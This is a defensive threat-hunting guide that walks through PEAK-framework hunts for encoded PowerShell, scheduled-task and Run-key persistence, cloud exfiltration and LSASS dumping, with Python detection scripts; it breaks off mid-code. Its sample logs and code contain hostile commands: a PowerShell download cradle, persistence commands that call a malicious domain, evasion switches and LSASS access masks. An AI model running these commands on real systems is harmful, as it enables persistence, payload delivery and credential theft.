Using Peak Framework For Mitre Att&Ck-Aligned Threat Hunting: Scenarios and Simulations

The document outlines the PEAK framework for MITRE ATT&CK-aligned threat hunting, detailing the four phases: Plan, Execute, Analyze, and Communicate. It provides specific scenarios and simulations, including abnormal login behavior, persistence via scheduled tasks, and data exfiltration to cloud storage, emphasizing the importance of hypothesis-driven hunts and collaboration among security teams. Recommendations for each scenario include immediate actions and improvements to detection capabilities.


USING PEAK FRAMEWORK FOR MITRE ATT&CK-ALIGNED THREAT HUNTING: SCENARIOS AND SIMULATIONS
BY IZZMIER IZZUDDIN
PEAK Threat Hunting

Plan (P), Execute (E), Analyse (A), Communicate (C)

1. PLAN

Purpose: Define what you're hunting for and why. This includes scoping the hunt, setting
hypotheses, selecting data sources and identifying relevant ATT&CK techniques.

Key Activities:

• Define hypotheses: for example, “Attackers may be using valid accounts to maintain persistence.”
• Scope the hunt: decide on the time range, systems and users involved.
• Map to MITRE ATT&CK: T1078 - Valid Accounts.
• Identify telemetry sources: Active Directory logs, endpoint authentication logs, VPN access logs.

2. EXECUTE

Purpose: Use tools and queries to search through the relevant data to validate or refute the
hypothesis.

Key Activities:

• Run queries in the SIEM or log platform (Splunk, ELK, Sentinel).
• Filter out noise and irrelevant events.
• Look for patterns indicating abnormal activity (for example, a user logging in from two countries within 10 minutes).
• Pivot on findings: if you find anomalies, follow the trail (for example, unusual PowerShell execution after login).

3. ANALYSE

Purpose: Examine the findings, understand what they mean and determine if further action
is needed (escalation or remediation).

Key Activities:

• Enrich findings with threat intelligence (IP reputation, file hashes, etc.).
• Correlate with known TTPs from MITRE ATT&CK or past incidents.
• Assess impact or risk level based on behaviour, assets and user context.
• Document analysis clearly for repeatability.
4. COMMUNICATE

Purpose: Share the findings with relevant stakeholders in an understandable and actionable format.

Key Activities:

• Write a hunt report including background, hypothesis, methodology, findings, impact and recommendations.
• Present to the IR team, SOC or management depending on severity.
• Recommend improvements to detection rules, logging gaps or defensive controls.
• Feed findings back into SIEM detection rules or SOAR playbooks for automation.

PEAK Example: Threat Hunt for Abnormal Login Behaviour

Step: Plan
Hypothesis: A compromised account is being used from an unusual location.
Data needed: VPN logs, AD logon logs, geolocation lookup, user asset context.

Step: Execute
Query: Find logins from foreign countries in the past 30 days.
Filter: Exclude known travel or remote workers.
Pivot: Check what the user did after login: any lateral movement or sensitive file access?

Step: Analyse
Result: User A logged in from an IP in Russia at 2 AM and accessed the finance folder within 5 minutes.
Assessment: Suspicious. Enrichment shows the IP has a high-risk score on threat intel feeds.

Step: Communicate
Write the report, alert IR, suggest blocking the IP and require MFA for User A.

Why Use PEAK

• Encourages hypothesis-driven and repeatable hunts.
• Forces clear documentation and logic-based decisions.
• Promotes collaboration between SOC, IR and engineering teams.
• Builds a consistent hunting culture across analysts and teams.
FULL THREAT HUNTING SIMULATION USING THE PEAK FRAMEWORK

SCENARIO 1: SUSPICIOUS USE OF POWERSHELL VIA COMPROMISED ACCOUNT

Background: A user reports that they received an alert from their email provider about a
login from an unusual location. The user did not initiate that login. A quick check by IT
shows no VPN usage from the user’s laptop at that time. SOC decides to initiate a threat
hunt to identify possible misuse of the user account and detect similar cases across the
organisation.

THREAT HUNTING USING PEAK FRAMEWORK

1. PLAN

Hypothesis: An attacker has compromised a valid user account and is using native tools
like PowerShell to conduct post-compromise actions such as reconnaissance or lateral
movement.

TTP Reference (MITRE ATT&CK):

• T1078: Valid Accounts
• T1059.001: Command and Scripting Interpreter – PowerShell
• T1087: Account Discovery
• T1021.006: Remote Services – Windows Remote Management (PowerShell Remoting)

Scope of Hunt:

• Timeframe: Last 7 days
• Data sources: Windows Event Logs (Sysmon, Security), EDR logs, VPN logs
• Target: Users who logged in from anomalous locations or outside working hours

Telemetry to Review:

• Logon events (Security Event ID 4624, 4625)
• PowerShell execution logs (Sysmon Event ID 1 for process creation; Event ID 4104 from PowerShell Script Block Logging in the Microsoft-Windows-PowerShell/Operational log)
• VPN authentication logs
• EDR telemetry for process trees and network connections

2. EXECUTE

Logs (Windows Security and Sysmon):

Security Event - Logon Success (4624):

Date: 2025-07-15 02:31:24
Username: iffah
Logon Type: 10 (RemoteInteractive)
Source IP: 185.200.45.22 (unknown Russian IP)
Workstation Name: HOST-1234
Authentication Package: NTLM

Sysmon Event ID 1 - Process Creation:

Date: 2025-07-15 02:33:09
Process: powershell.exe
User: iffah
Parent Process: explorer.exe
Command Line: powershell.exe -nop -w hidden -encodedCommand SQBmACgA... (Base64 over UTF-16LE)
SHA256: ab12cd34ef56...

Sysmon Event ID 3 - Network Connection:

Date: 2025-07-15 02:34:01
Process: powershell.exe
Destination IP: 91.214.124.17
Destination Port: 443
Protocol: TCP

EDR Alert - Suspicious PowerShell Activity:

• High-entropy encoded PowerShell command
• Attempted download from remote server
• Execution of AMSI bypass script

VPN Logs:

No VPN session for iffah between 02:30 and 03:00 on 2025-07-15

Execution Process Summary:

• Logon from suspicious IP
• PowerShell launched within 2 minutes
• Encoded command executed
• Outbound connection made over HTTPS (TCP/443)
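The four Execute steps above can be expressed as one repeatable query. The Python below is an added example written for this edit, not code from the original document: it decodes the -EncodedCommand argument the way PowerShell does (Base64 over UTF-16LE, which is why the quoted payload starts with SQBmACgA, the encoding of "If("), flags the evasion switches on the command line, and links an external RemoteInteractive logon (4624, type 10) to a PowerShell start for the same user on the same host inside a five-minute window. The corporate address ranges, the event field names, the stand-in payload and the second, benign host are assumptions; the sample events are constructed to mirror the records quoted above and are not real telemetry.

```python
import base64
import ipaddress
import re
from datetime import datetime, timedelta

# Assumed corporate address space; anything outside it is treated as external.
CORPORATE_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "192.168.0.0/16")]

# PowerShell's -EncodedCommand is Base64 over UTF-16LE text. This is a harmless
# stand-in for the attacker's payload; the URL is a reserved, non-routable name.
STAGE2 = "If($true){IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/a.ps1')}"
ENCODED = base64.b64encode(STAGE2.encode("utf-16-le")).decode("ascii")

# Constructed sample telemetry modelled on the 4624 and Sysmon 1 records above.
# The second host (HOST-0007, user aina) is an assumed benign control.
EVENTS = [
    {"ts": "2025-07-15 02:31:24", "host": "HOST-1234", "user": "iffah", "id": "4624",
     "logon_type": 10, "src_ip": "185.200.45.22"},
    {"ts": "2025-07-15 02:33:09", "host": "HOST-1234", "user": "iffah", "id": "sysmon1",
     "image": "powershell.exe", "parent": "explorer.exe",
     "cmdline": "powershell.exe -nop -w hidden -encodedCommand " + ENCODED},
    {"ts": "2025-07-15 09:05:00", "host": "HOST-0007", "user": "aina", "id": "4624",
     "logon_type": 10, "src_ip": "10.10.5.7"},
    {"ts": "2025-07-15 09:06:00", "host": "HOST-0007", "user": "aina", "id": "sysmon1",
     "image": "powershell.exe", "parent": "explorer.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\inventory.ps1"},
]

ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
SUSPICIOUS = {
    "noprofile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "hidden": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "encoded": ENC_RE,
}


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand text, or None if absent or not decodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def powershell_flags(cmdline):
    """Names of the evasion switches present on the command line, sorted."""
    return sorted(name for name, rx in SUSPICIOUS.items() if rx.search(cmdline))


def is_external(ip):
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in CORPORATE_NETS)


def _ts(event):
    return datetime.strptime(event["ts"], "%Y-%m-%d %H:%M:%S")


def hunt(events, window_minutes=5):
    """Hypothesis test: an external RemoteInteractive logon followed, within the window,
    by PowerShell carrying evasion switches for the same user on the same host."""
    logons = [e for e in events
              if e["id"] == "4624" and e["logon_type"] == 10 and is_external(e["src_ip"])]
    procs = [e for e in events if e["id"] == "sysmon1" and e["image"].lower() == "powershell.exe"]
    findings = []
    for lg in logons:
        for p in procs:
            if (p["user"], p["host"]) != (lg["user"], lg["host"]):
                continue
            delta = _ts(p) - _ts(lg)
            if not timedelta(0) <= delta <= timedelta(minutes=window_minutes):
                continue
            flags = powershell_flags(p["cmdline"])
            if flags:
                findings.append({"user": lg["user"], "host": lg["host"], "src_ip": lg["src_ip"],
                                 "seconds_to_powershell": int(delta.total_seconds()),
                                 "flags": flags, "decoded": decode_encoded_command(p["cmdline"])})
    return findings


if __name__ == "__main__":
    for finding in hunt(EVENTS):
        print(finding)
```

In a SIEM the same logic is a join of 4624 and Sysmon 1 on user and host with a time constraint; the decoder matters because the decoded text, not the Base64 blob, is what the Analyse step has to read and what later detection content should match on.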

3. ANALYSE
Investigation Summary:

1. Initial Access Observation: The user iffah logged in at 02:31 from an IP address not geolocated within the organisation’s operating countries. No VPN session was active.
2. Anomalous Execution: Within two minutes of the logon, powershell.exe was launched with a hidden window, no profile and a Base64-encoded payload. These switches are typical of attempts to evade basic monitoring and command-line logging.
3. Outbound Communication: PowerShell initiated an HTTPS connection (TCP/443) to an untrusted external IP. No approved service was expected to communicate with that address.
4. EDR Correlation: EDR flagged the PowerShell command as high-entropy and observed an attempted download of additional payloads, indicating possible staging for further exploitation or exfiltration.
5. No User Confirmation: On follow-up, the user confirmed they were not active during this time and were not aware of any logins from outside Malaysia.

This activity matches known post-compromise behaviour: valid credentials combined with built-in tools for command execution. The rapid sequence from logon to PowerShell execution, with no VPN session and no MFA in the path, indicates credential compromise rather than a policy violation by the user.

4. COMMUNICATE

Threat Hunting Report

• Title: Threat Hunt Report – Suspicious PowerShell Activity via Compromised Account
• Date: 2025-07-16
• Hunter: Izzmier (SOC Threat Hunter)
• Hypothesis: Valid accounts may be misused to perform PowerShell-based lateral movement or reconnaissance
• Findings:
o User iffah logged in from a suspicious IP without a VPN session
o Executed obfuscated PowerShell within 2 minutes of the logon
o Made an outbound HTTPS connection to an untrusted external IP
o EDR detected a high-entropy PowerShell script with signs of AMSI bypass
• MITRE Techniques Observed:
o T1078 (Valid Accounts)
o T1059.001 (Command and Scripting Interpreter: PowerShell)
o T1105 (Ingress Tool Transfer)
• Recommendations:
1. Disable the account iffah immediately
2. Reset the password and enforce MFA
3. Add detection rules for PowerShell launched with encoded commands (-EncodedCommand/-enc) together with evasion switches (-nop, -w hidden)
4. Investigate lateral movement to other endpoints during that session
5. Block the IPs and domains associated with this activity at the proxy/firewall
6. Schedule a full endpoint scan on HOST-1234
7. Enable PowerShell Script Block Logging (Event ID 4104) and process creation auditing with command-line capture (Event ID 4688) if not already enabled
• Next Steps:
o Escalate to Incident Response for containment and recovery
o Feed hunting queries into detection content
o Train SOC analysts on similar TTPs
SCENARIO 2: PERSISTENCE VIA SCHEDULED TASK AND UNUSUAL REGISTRY
MODIFICATION

Background: The SOC receives an alert from the EDR platform indicating that a system had
a PowerShell process that created a scheduled task. The host is not part of any IT
automation or DevOps environment and such behaviour is considered unusual. A hunt is
initiated to find if this activity is part of a broader persistence mechanism.

THREAT HUNTING USING PEAK FRAMEWORK

1. PLAN

Hypothesis: An attacker has established persistence by creating scheduled tasks and modifying the registry to ensure malicious code executes after reboot or logon.

TTP Reference (MITRE ATT&CK):

• T1053.005: Scheduled Task/Job – Scheduled Task
• T1547.001: Boot or Logon Autostart Execution – Registry Run Keys / Startup Folder
• T1059.001: Command and Scripting Interpreter – PowerShell
• T1055: Process Injection (possible follow-up)

Scope of Hunt:

• Timeframe: Last 14 days
• Data sources: Sysmon, Windows Event Logs (Security and TaskScheduler/Operational), registry modification logs, EDR telemetry
• Target: All workstations (excluding IT automation servers)

Telemetry to Review:

• Sysmon Event ID 1 (Process Create)
• Sysmon Event ID 13 (Registry Value Set) for Run and RunOnce keys
• Security Event ID 4698/4702 (scheduled task created/updated; requires the "Audit Other Object Access Events" subcategory) and Microsoft-Windows-TaskScheduler/Operational Event ID 106 (task registered). Sysmon itself does not log scheduled tasks; its Event IDs 19–21 cover WMI event subscriptions.
• EDR: Process trees, command lines, task creation behaviour

2. EXECUTE

Sysmon Event ID 1 - Process Creation:

Date: 2025-07-13 03:01:52
Process: powershell.exe
Parent Process: explorer.exe
User: hrstaff01
CommandLine: powershell.exe -Command "Register-ScheduledTask -TaskName 'ChromeUpdate' -Action (New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-Command Start-Process http://malicious[.]domain') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -RunLevel Highest"

Sysmon Event ID 13 - Registry Value Set:

Date: 2025-07-13 03:03:10
Process: reg.exe
Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\chromeup
Value: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command Start-Process http://malicious[.]domain
User: hrstaff01

Security Event ID 4698 - Scheduled Task Created:

Date: 2025-07-13 03:01:58
Task Name: ChromeUpdate
Author: hrstaff01
Action Path: powershell.exe
Trigger Type: At Logon

EDR Alert:

• Custom rule triggered: scheduled task creation by PowerShell
• Registry autorun entry written by a low-privilege user
• No legitimate software installation in logs

User Activity:

• Host: HR-WS-57
• User: hrstaff01
• Confirmed not installing any application
• System has no known legitimate Chrome scheduled task
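The task action and the Run value above are the same payload registered twice, and the same triage logic applies to both. The following Python is an added example, not code from the original document: it scores each autorun entry on what it launches (a script interpreter), how it launches it (hidden window, execution policy bypass, encoded command), whether it pulls a URL at logon, and whether a name that imitates a vendor updater points at a binary outside the vendor's install location. The scoring weights, the trusted directories, the interpreter list and the two benign control entries are assumptions; the four sample entries are constructed to mirror the artefacts quoted above, with the domain left undefanged so the parser can read it.

```python
import re
from urllib.parse import urlparse

# Constructed autorun artefacts modelled on the Sysmon 13 value and the scheduled task
# quoted above. The two benign entries (a vendor updater task and a OneDrive Run value)
# are assumptions added as controls.
AUTORUNS = [
    {"source": "scheduled_task", "host": "HR-WS-57", "user": "hrstaff01", "name": "ChromeUpdate",
     "command": "powershell.exe -Command Start-Process http://malicious.domain"},
    {"source": "run_key", "host": "HR-WS-57", "user": "hrstaff01",
     "name": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\chromeup",
     "command": "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass "
                "-Command Start-Process http://malicious.domain"},
    {"source": "scheduled_task", "host": "HR-WS-57", "user": "SYSTEM", "name": "GoogleUpdateTaskMachineUA",
     "command": r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler"},
    {"source": "run_key", "host": "FIN-WS-02", "user": "finance_mgr01",
     "name": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "command": r"C:\Users\finance_mgr01\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
]

INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
TRUSTED_DIRS = ("c:\\program files", "c:\\windows\\system32")   # assumed vendor locations
UPDATER_WORDS = ("update", "chrome", "google", "adobe", "java", "office")
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)
EVASION_RE = re.compile(
    r"-(?:w(?:indowstyle)?\s+hidden|e(?:xecutionpolicy|p)\s+bypass|nop(?:rofile)?\b"
    r"|e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,})", re.I)


def first_image(command):
    """The executable an autorun launches: text up to the first '.exe', quotes stripped."""
    m = re.match(r'\s*"?(.*?\.exe)\b"?', command, re.I)
    return m.group(1) if m else command.split()[0]


def score_autorun(entry):
    """Score one persistence entry and list the reasons; higher means more suspicious."""
    command = entry["command"]
    path = first_image(command)
    image = path.rsplit("\\", 1)[-1].lower()
    name = entry["name"].rsplit("\\", 1)[-1].lower()
    reasons = []
    if image in INTERPRETERS:
        reasons.append(("interpreter_as_autorun", 2))
    if EVASION_RE.search(command):
        reasons.append(("evasion_switches", 3))
    if URL_RE.search(command):
        reasons.append(("fetches_url_at_logon", 2))
    if any(w in name for w in UPDATER_WORDS) and not path.lower().startswith(TRUSTED_DIRS):
        reasons.append(("updater_name_untrusted_binary", 2))
    if re.search(r"\\(users|temp|programdata)\\", path, re.I):
        reasons.append(("user_writable_path", 1))
    return sum(s for _, s in reasons), [r for r, _ in reasons]


def triage(entries, threshold=4):
    """Entries at or above the threshold, ready for the Analyse step."""
    out = []
    for e in entries:
        score, reasons = score_autorun(e)
        if score >= threshold:
            out.append({"host": e["host"], "user": e["user"], "source": e["source"],
                        "name": e["name"], "score": score, "reasons": reasons})
    return out


def extract_hosts(entries):
    """Hostnames from any URL embedded in an autorun command (candidate IOCs)."""
    return sorted({urlparse(u).hostname for e in entries for u in URL_RE.findall(e["command"])})


if __name__ == "__main__":
    for hit in triage(AUTORUNS):
        print(hit)
    print("IOCs:", extract_hosts(AUTORUNS))
```

Run against a full Sysmon 13 and 4698 export, the same scoring surfaces persistence on every host that shares the pattern, which is the "monitor for similar behaviour across other endpoints" recommendation made concrete.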

3. ANALYSE

Investigation Summary:

1. Scheduled Task Creation:
PowerShell created a task named ChromeUpdate, which sounds legitimate, but the associated action launches a PowerShell command that opens a web page from a suspicious domain.
2. Registry Persistence:
A registry Run key value was created under the current user profile to silently execute PowerShell at each logon, pointing to the same malicious domain.
3. No Corresponding Installer Logs:
No MSI or EXE installation logs were found. The task and registry value were not created by a software update process; the timing indicates manual execution or a script.
4. TTP Match:
Scheduled task creation (T1053.005) and Registry Run key modification (T1547.001) are classic persistence techniques.
5. Potential Intent:
The goal is likely to re-establish access every time the user logs in by fetching malicious payloads from the attacker-controlled domain.

The observed behaviour strongly indicates an attempt to maintain persistence using legitimate Windows mechanisms. The use of a misleading task name and registry value name aligns with known stealth techniques, and immediate containment is recommended.

4. COMMUNICATE

Threat Hunting Report

• Title: Threat Hunt Report – Scheduled Task and Registry Persistence via PowerShell
• Date: 2025-07-20
• Hunter: Izzmier (SOC Threat Hunter)
• Hypothesis: Malicious actors may use scheduled tasks and registry autoruns to
maintain persistence
• Findings:
o powershell.exe used to create a scheduled task (ChromeUpdate) with
suspicious action
o Registry Run key (chromeup) points to same malicious PowerShell payload
o Activity observed under user hrstaff01 without valid justification
o Domain used in PowerShell script is not whitelisted and appears in open-
source blocklists
• MITRE Techniques Observed:
o T1053.005 (Scheduled Task)
o T1547.001 (Registry Run Key)
o T1059.001 (PowerShell Execution)
• Recommendations:
1. Disable and remove scheduled task and registry entry
2. Block malicious[.]domain at the firewall/proxy
3. Run full malware scan on host HR-WS-57
4. Reset user credentials for hrstaff01
5. Monitor for similar behaviour across other endpoints
6. Implement alerts for non-approved scheduled tasks and registry autoruns
• Next Steps:
o Review Group Policy to restrict registry editing and task creation
o Add logic to EDR/SIEM for early detection of PowerShell-based persistence
o Share findings with IR and malware analysis team to check for deeper
implants
SCENARIO 3: EXFILTRATION VIA CLOUD STORAGE (GOOGLE DRIVE OR DROPBOX)

Background: During routine proxy log review, the security team notices large outbound
data transfers to Google Drive from a workstation that does not typically use cloud storage.
The endpoint belongs to a user in the finance department. A threat hunt is launched to
determine whether this activity is legitimate or a sign of data exfiltration.

THREAT HUNTING USING PEAK FRAMEWORK

1. PLAN

Hypothesis: An insider or an external actor with access to a compromised workstation is exfiltrating sensitive data (financial reports) to unauthorised cloud storage platforms such as Google Drive or Dropbox.

TTP Reference (MITRE ATT&CK):

• T1567.002: Exfiltration Over Web Service – Exfiltration to Cloud Storage
• T1071.001: Application Layer Protocol – Web Protocols (HTTPS)
• T1041: Exfiltration Over C2 Channel (applies only if a C2 channel is found; a browser upload to a legitimate service is T1567.002)
• T1059: Command and Scripting Interpreter (PowerShell, etc.)

Scope of Hunt:

• Timeframe: Last 7 days
• Data sources: Proxy logs, EDR, DLP logs, file access logs
• Focus: Outbound connections to cloud storage from sensitive departments (Finance, Legal)

Telemetry to Review:

• Web proxy logs (URL, method, byte count)
• EDR logs for file movement and cloud sync activity
• Windows file access logs (if available)
• Data Loss Prevention (DLP) violations or attempts

2. EXECUTE

Proxy Log Entry:

Date: 2025-07-18 10:22:51
Source IP: 192.168.45.88 (FIN-WS-02)
User: finance_mgr01
URL: https://drive.google.com/upload
Method: POST
Bytes Out: 452,000,000
Bytes In: 1,200
User-Agent: Chrome/115.0
Category: Cloud Storage

Follow-up Logs:

- 7 separate POST requests to drive.google.com totalling ~3.5 GB
- Activity continued outside regular working hours (6:30 PM to 9:00 PM)
- No legitimate Google Drive use recorded from this user in the past 3 months

EDR File Activity Log:

User: finance_mgr01
Host: FIN-WS-02
Date: 2025-07-18
Observed Activity:
- Accessed directory "D:\Company_Financials_2023"
- Zipped multiple Excel and PDF files (~500 MB total)
- Compressed file named: "project_docs.zip"
- File opened via Chrome shortly before upload

DLP Events:

No block action was taken, but large file movement was detected
Policy Violation: "Attempted transfer of sensitive files to cloud storage"
Confidence Score: High
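The proxy and DLP records above give bytes, method, host and time per request, which is enough to make this hunt repeatable across every user rather than a one-off review. The Python below is an added example, not code from the original document: it totals POST/PUT bytes to cloud-storage hosts per user per day, compares each user's day against their own previous daily maximum, and reports how much of the flagged volume went out of office hours. Office hours, the cloud-storage host list, the thresholds and the baseline rows for the other user are assumptions; the seven evening uploads are constructed to mirror the follow-up logs quoted above.

```python
from collections import defaultdict
from datetime import datetime, time

# Assumed office hours and the upload endpoints the proxy categorises as cloud storage.
WORK_HOURS = (time(8, 0), time(18, 0))
CLOUD_STORAGE_HOSTS = {"drive.google.com", "www.dropbox.com", "content.dropboxapi.com",
                       "onedrive.live.com"}

# Constructed proxy records (user, timestamp, host, method, bytes_out) modelled on the
# entry quoted above. The seven evening uploads mirror the follow-up logs; the rows for
# the other user and for earlier days are an assumed baseline.
UPLOAD_TIMES = ["18:31", "18:52", "19:14", "19:37", "20:01", "20:24", "20:49"]
PROXY = [("finance_mgr01", f"2025-07-18 {t}:00", "drive.google.com", "POST", 500_000_000)
         for t in UPLOAD_TIMES]
PROXY[0] = ("finance_mgr01", "2025-07-18 18:31:00", "drive.google.com", "POST", 452_000_000)
PROXY += [
    ("finance_mgr01", "2025-07-10 11:02:03", "www.office.com", "GET", 12_000),
    ("finance_mgr01", "2025-07-17 14:30:00", "drive.google.com", "GET", 4_000),
    ("eng_dev02", "2025-07-11 15:10:00", "drive.google.com", "POST", 25_000_000),
    ("eng_dev02", "2025-07-18 14:10:00", "drive.google.com", "POST", 30_000_000),
]


def _dt(stamp):
    return datetime.strptime(stamp, "%Y-%m-%d %H:%M:%S")


def is_cloud_upload(rec):
    _, _, host, method, _ = rec
    return host in CLOUD_STORAGE_HOSTS and method in ("POST", "PUT")


def daily_cloud_uploads(records):
    """(user, date) -> bytes sent to cloud storage by POST/PUT on that day."""
    totals = defaultdict(int)
    for rec in records:
        if is_cloud_upload(rec):
            user, stamp, _, _, nbytes = rec
            totals[(user, _dt(stamp).date())] += nbytes
    return totals


def off_hours_share(records, user, day):
    """Fraction of the user's cloud-upload bytes on `day` sent outside WORK_HOURS."""
    total = off = 0
    for rec in records:
        if is_cloud_upload(rec) and rec[0] == user and _dt(rec[1]).date() == day:
            total += rec[4]
            if not WORK_HOURS[0] <= _dt(rec[1]).time() < WORK_HOURS[1]:
                off += rec[4]
    return off / total if total else 0.0


def hunt(records, day, min_bytes=100_000_000, ratio=10):
    """Users whose cloud uploads on `day` ('YYYY-MM-DD') exceed min_bytes and are at least
    `ratio` times their own largest previous day (a user with no history is flagged too)."""
    day = datetime.strptime(day, "%Y-%m-%d").date()
    totals = daily_cloud_uploads(records)
    findings = []
    for user in sorted({u for u, _ in totals}):
        today = totals.get((user, day), 0)
        prior_max = max((b for (u, d), b in totals.items() if u == user and d < day), default=0)
        if today >= min_bytes and today >= ratio * prior_max:
            findings.append({"user": user, "bytes_out": today, "prior_daily_max": prior_max,
                             "off_hours_share": round(off_hours_share(records, user, day), 2)})
    return findings


if __name__ == "__main__":
    for finding in hunt(PROXY, "2025-07-18"):
        print(finding)
```

Comparing a user against their own history is what keeps the engineering user out of the result: a team that uses Google Drive every day is not an anomaly at 30 MB, while a finance user with no prior uploads is at 3.4 GB. The DLP "no block" outcome above is the gap this query closes in the meantime.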

3. ANALYSE

Investigation Summary:

1. Unusual Upload Behaviour:
Proxy logs show large uploads to Google Drive over HTTPS from a user account that does not normally use cloud storage.
2. Time Anomaly:
Uploads continued outside working hours (after 6 PM), which is uncommon for this user and department.
3. File Access Analysis:
EDR showed that the user zipped confidential financial files before uploading them. The filenames match sensitive financial reports.
4. No Whitelisting:
Google Drive is not a sanctioned platform for file transfers in the finance department.
5. No Malware Indicators:
No malware or script execution was found, which points to an insider action rather than a remote attacker.

The activity shows clear indicators of potential data exfiltration by a legitimate user
account. This may be an insider threat or unauthorised personal action.

4. COMMUNICATE

Threat Hunting Report

• Title: Threat Hunt Report – Potential Insider Data Exfiltration to Google Drive
• Date: 2025-07-20
• Hunter: Izzmier (SOC Threat Hunter)
• Hypothesis: Threat actor may use unsanctioned cloud storage platforms to
exfiltrate sensitive company data
• Findings:
o finance_mgr01 uploaded 3.5 GB of data to Google Drive outside normal
hours
o Activity originated from FIN-WS-02, confirmed to be the user's workstation
o Zipped confidential financial files found in local access logs
o No malware or unauthorised tools found; activity was performed using
native apps (Chrome, Zip utility)
o Google Drive is not authorised for use in Finance; violates policy
• MITRE Techniques Observed:
o T1567.002 (Exfiltration Over Web Service: Exfiltration to Cloud Storage)
o T1071.001 (Application Layer Protocol: Web Protocols, HTTPS)
o T1041 (Exfiltration Over C2 Channel) was part of the hypothesis but was not observed: there is no C2 channel here; the transfer went through an ordinary browser session to a legitimate service, which T1567.002 already covers
• Recommendations:
1. Escalate to HR and Legal for insider risk investigation
2. Disable Google Drive access at the firewall for non-whitelisted roles
3. Monitor large outbound transfers to cloud apps
4. Deploy DLP block policy for ZIPs containing sensitive keywords
5. Interview the user to determine intent and access legitimacy
6. Review past 90 days of this user’s proxy and file activity for pattern
• Next Steps:
o Inform data protection officer (DPO) and compliance teams
o Integrate this TTP into insider threat monitoring dashboards
o Conduct awareness campaign on proper data handling in sensitive
departments
SCENARIO 4: CREDENTIAL DUMPING VIA LSASS ACCESS ON PRIVILEGED HOST

Background: EDR detects a rare access attempt to lsass.exe (Local Security Authority
Subsystem Service) memory from a process on a domain controller. This action is a known
technique used to dump credentials using tools like Mimikatz. A hunt is initiated to
determine whether other similar credential dumping attempts have occurred across
critical systems.

THREAT HUNTING USING PEAK FRAMEWORK

1. PLAN

Hypothesis: An attacker is attempting to dump credentials from memory on high-value systems such as domain controllers by accessing lsass.exe using credential dumping tools or by abusing native functionality.

TTP Reference (MITRE ATT&CK):

• T1003.001: OS Credential Dumping – LSASS Memory
• T1055: Process Injection
• T1082: System Information Discovery
• T1569.002: System Services – Service Execution (if lateral movement was used)

Scope of Hunt:

• Timeframe: Past 10 days
• Target Systems: Domain Controllers and Tier 0 servers
• Data Sources: EDR logs, Sysmon (Event ID 10 for process access), Windows Security logs
• Focus: lsass.exe accessed by any non-system process

Telemetry to Review:

• EDR detections and process access logs
• Sysmon Event ID 10 for suspicious access to lsass.exe (SourceImage, GrantedAccess, CallTrace)
• Security Event Logs for process creation (4688) and injection
• LSASS memory dump indicators (MiniDumpWriteDump, dbghelp.dll/dbgcore.dll usage, the comsvcs.dll MiniDump export)

2. EXECUTE

Sysmon Event ID 10 – Process Access:

Date: 2025-07-15 01:44:22
Source Process: c:\windows\temp\svcdiaghost.exe
Source PID: 5524
Target Process: lsass.exe
Target PID: 564
Granted Access: 0x1410 (PROCESS_VM_READ | PROCESS_QUERY_INFORMATION | PROCESS_QUERY_LIMITED_INFORMATION)
User: svc-backup
Host: DC-01

Sysmon Event ID 1 – Process Creation:

Date: 2025-07-15 01:43:51
Process Name: svcdiaghost.exe
Parent: cmd.exe
Command Line: svcdiaghost.exe -minidump
SHA256: b1e92c44f3...
Signed: False

EDR Alert:

• Alert: Unauthorised memory access to LSASS detected
• Classification: Suspicious process not whitelisted accessing critical process memory
• Risk: High
• Action: Logged only (no automatic remediation configured)

Security Log – Service Account Activity:

User: svc-backup
Logged in interactively at 01:40:00
Unusual time for scheduled tasks
No interactive login history in past 30 days

VirusTotal Scan (Hash):

• Result: 25/69 engines detect svcdiaghost.exe as Mimikatz variant
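The GrantedAccess value in the Sysmon event above is the field that decides the case, and it is easier to reason about with the bits spelled out. The following Python is an added example, not code from the original document: it decodes a Sysmon Event ID 10 access mask into the Windows process rights it contains, then flags any process that opened lsass.exe with PROCESS_VM_READ (the right a memory dumper needs) and is not on an allowlist of processes that legitimately do so. The allowlist, the EDR sensor path, the set of masks treated as dumper signatures and the benign control rows are assumptions; the DC-01 event is constructed to mirror the record quoted above.

```python
import re

# Windows process access rights (winnt.h values) relevant to a Sysmon Event ID 10 mask.
ACCESS_BITS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
PROCESS_ALL_ACCESS = 0x1FFFFF
# Masks commonly associated with LSASS dumping tools (assumed list; tune per environment).
DUMPER_MASKS = {0x1010, 0x1410, 0x1438, 0x143A, 0x1FFFFF}

# Processes that legitimately read lsass.exe memory. The EDR sensor path is an assumption.
ALLOWED_LSASS_READERS = {
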